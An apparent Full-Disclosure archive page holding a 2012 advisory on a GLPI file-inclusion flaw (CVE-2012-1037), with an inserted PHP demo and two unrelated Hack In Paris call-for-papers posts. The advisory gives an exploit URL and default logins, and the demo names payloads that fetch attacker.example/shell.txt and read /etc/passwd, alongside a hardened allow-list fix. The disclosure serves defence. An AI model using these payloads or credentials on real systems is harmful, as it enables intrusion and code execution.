[Full-disclosure] CVE-2012-1037: GLPI <= 0.80.61 LFI/RFI

2012-02-10 Thread Emilien Girault
CVE-2012-1037: GLPI <= 0.80.61 LFI/RFI

Severity: Important

Vendor: GLPI - http://www.glpi-project.org

Versions Affected
=================

All versions between 0.78 and 0.80.61

Description
===========

GLPI fails to properly sanitize the GET 'sub_type' parameter in the 
front/popup.php file:

  [...]
  checkLoginUser();

  if (isset($_GET["popup"])) {
     $_SESSION["glpipopup"]["name"] = $_GET["popup"];
  }

  if (isset($_SESSION["glpipopup"]["name"])) {
     switch ($_SESSION["glpipopup"]["name"]) {
        [...]
        case "add_ruleparameter" :
           popHeader($LANG['ldap'][35], $_SERVER['PHP_SELF']);
           include strtolower($_GET['sub_type']."Parameter.php");   // <===
           break;
        [...]
  
To be triggered, the attacker needs to be authenticated. However, GLPI provides 
default accounts that often aren't changed or disabled:

glpi/glpi
tech/tech
normal/normal
post-only/postonly

Impact
======

Nothing is prepended to the user-controlled value, so the vulnerability can be 
used as an RFI (requires allow_url_include = On): a remote URL is accepted as 
the start of the include path, and the appended suffix can be absorbed by the 
URL's query string.

For LFI, the target file has to end in parameter.php (the suffix is lowercased 
together with the rest of the path). GLPI automatically escapes all GET and 
POST parameters with addslashes(), so the null byte technique is not usable. 
I have not tested exploitation using the path truncation technique, but it 
might be possible.
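The following is an added example, not GLPI code and not the advisory author's code. Part 1 rebuilds the include path the way the affected front/popup.php does (user value first, the "Parameter.php" suffix last, everything lowercased), with GLPI's escaping of request values modelled as a direct addslashes() call, and classifies what each payload shape would do without performing any include. Part 2 is one hardened replacement in which the request only selects a key in a fixed map and never contributes characters to the path. The host name attacker.example, the sub_type values and the file names are hypothetical.

```php
<?php
// Added example: not GLPI code and not the advisory author's code.
// Host names, sub_type values and file names below are hypothetical.

// ---- Part 1: what the vulnerable line turns a payload into ----------------

/** The string the vulnerable include would receive; nothing is included here. */
function vulnerableIncludePath(string $subType): string
{
    $escaped = addslashes($subType);               // GLPI escapes every GET/POST value
    return strtolower($escaped . "Parameter.php"); // input first, fixed suffix last
}

/** Inspect the shape of the resulting path; no filesystem or network access. */
function classify(string $path): string
{
    if (preg_match('#^[a-z][a-z0-9+.-]*://#', $path)) {
        return 'RFI: scheme comes first, suffix lands in the query string (needs allow_url_include=On)';
    }
    if (strpos($path, '\\0') !== false) {          // addslashes() turned NUL into the two characters \0
        return 'NUL escaped by addslashes(): suffix survives, truncation fails';
    }
    if (strpos($path, '../') !== false) {
        return 'LFI: traversal works, but the target must end in parameter.php';
    }
    return 'intended use: <sub_type>parameter.php from the working directory';
}

// ---- Part 2: a hardened form (fixed map, no string building from input) ----

/** Map a request to a file below $baseDir, or null if it is not allow-listed. */
function resolveParameterFile(array $get, string $baseDir): ?string
{
    static $allowed = [
        'example' => 'exampleparameter.php',       // hypothetical allowed type
    ];
    $key = isset($get['sub_type']) ? strtolower((string) $get['sub_type']) : '';
    if (!array_key_exists($key, $allowed)) {
        return null;                               // unknown type: refuse, build no path
    }
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$key]);
    $base = realpath($baseDir);
    // Defence in depth: the resolved file must still sit below $baseDir.
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// ---- Demonstration ---------------------------------------------------------

$payloads = [
    'Example',                             // the intended kind of value
    'http://attacker.example/shell.txt?',  // '?' turns the suffix into a query string
    '../../../../etc/passwd',              // suffix is still appended
    "../../../../etc/passwd\0",            // NUL byte as a client would send it
];

echo "Vulnerable include path:\n";
foreach ($payloads as $p) {
    $path = vulnerableIncludePath($p);
    printf("  %-48s %s\n", $path, classify($path));
}

// Scratch directory so that realpath() has a real file to resolve.
$dir = sys_get_temp_dir() . '/popup_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/exampleparameter.php", "<?php // placeholder\n");

echo "\nHardened resolver:\n";
foreach ($payloads as $p) {
    $file = resolveParameterFile(['sub_type' => $p], $dir);
    printf("  %-36s => %s\n", addcslashes($p, "\0"), $file ?? 'REJECTED');
}
// if ($file !== null) { include $file; }   // only ever an allow-listed file

unlink("$dir/exampleparameter.php");
rmdir($dir);
```

Run it with the PHP CLI (php popup_demo.php). The first table shows why the trailing `?` on the remote payload matters: the suffix becomes part of the URL's query string, so the remote file is fetched unchanged, whereas the escaped NUL keeps parameter.php glued to the local path. The resolver in Part 2 accepts only the mapped key and rejects the other three inputs before any path is built, which is the property to look for in a fix regardless of how the project itself patched it.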


Mitigation
==========

Upgrade to GLPI 0.80.7.


Exploit
=======

http://server/front/popup.php?popup=add_ruleparameter&sub_type=file


Timeline
========

08 feb 2012 - Found the bug.
09 feb 2012 - Contacted the GLPI Team.
09 feb 2012 - Bug fixed & new version available.

Thanks to the GLPI team for being responsive!

References
==========

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1037
https://forge.indepnet.net/projects/glpi/versions/685
https://forge.indepnet.net/projects/glpi/repository/revisions/17457/diff/branches/0.80-bugfixes/front/popup.php


-- 
Emilien Girault

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Hack In Paris 2011 Call For Papers Reminder

2011-03-23 Thread Emilien Girault
Hello FD!

This is just a reminder that the Call for Papers for Hack In Paris 2011 is 
closing on 30th of March. We've received some very nice submissions so far.

Hack In Paris will take place in Disneyland Paris Conference Center and 
will be split into two parts:
  * June 14-15: Trainings
  * June 16-17: Talks

Please do not hesitate to submit! Your submission should contain the 
following elements:
  * The biography of each author
  * A short description (abstract) of your presentation
  * The summary of your research, including technical information;
in particular novel research with regards to the state of the art
  * An estimation of your expenses (trip and hotel)

Please send your proposal to cfp[at]hackinparis[dot]com.


Contact & Social Media
======================

Contact:info[at]hackinparis[dot]com
Website:http://www.hackinparis.com/
Twitter:http://twitter.com/hackinparis
Facebook:   http://www.facebook.com/pages/Hack-In-Paris/134611446603792
Linkedin:   http://www.linkedin.com/groups?gid=3750882



-- the HIP team



[Full-disclosure] Hack In Paris 2011 Call For Papers

2011-01-21 Thread Emilien Girault

Hack In Paris 2011

http://www.hackinparis.com/

 Call For Papers



Introduction
============

Since 2004, Sysdream and HZV have organized the Nuit du Hack
(Hacker's Night) event in Paris, France. After the success of last
year, with more than 600 attendees, we are planning a more
international and corporate event. Aiming to bring together security
professionals and enthusiasts, Hack In Paris will focus on the latest
advances in IT security.

The conference will be held at Disney's Conference Centre in
Disneyland Paris from June 16th to 17th of 2011. This place is
easily accessible by train (15mn ride) from downtown Paris and
airports.


Topics
======

The following list contains major topics the conference will cover.
Please consider submitting even if the subject of your research is
not listed here.

* Advances in reverse engineering
* Vulnerability research and exploitation
* Penetration testing and security assessment
* Malware analysis and new trends in malicious codes
* Forensics, IT crime & law enforcement
* Privacy issues: LOPPSI, HADOPI, ...
* Low-level hacking (console security & mobile devices)
* Risk management and ISO 27001


How to submit?
==============

Submissions should contain the following elements:

* The biography of each author
* A short description (abstract) of your presentation
* The summary of your research, including technical information;
  in particular novel research with regards to the state of the art
* An estimation of your expenses (trip and hotel)

Please send your proposal to cfp[at]hackinparis[dot]com.

Note: presentations will take about 45 minutes, including 5 to 10
minutes of questions.

All submissions will be reviewed by our program committee. Authors
will be notified upon acceptance of their talk.


Upcoming dates
==============

January 20  CFP announced
April 31Submission deadline
May 15  Notification sent to authors
May 17  Program announcement
June 16-17  Hack In Paris
June 18 Nuit du Hack


Trainings
=========

We are also looking for experienced professionals to give one or
two-day trainings. Contact trainings[at]hackinparis[dot]com.


Contact & Social Media
======================

Contact:info[at]hackinparis[dot]com
Twitter:http://twitter.com/hackinparis
Facebook:   http://www.facebook.com/pages/Hack-In-Paris/134611446603792
Linkedin:   http://www.linkedin.com/groups?gid=3750882


Thank you very much, and we hope to see you soon in Paris!

-- the HIP team
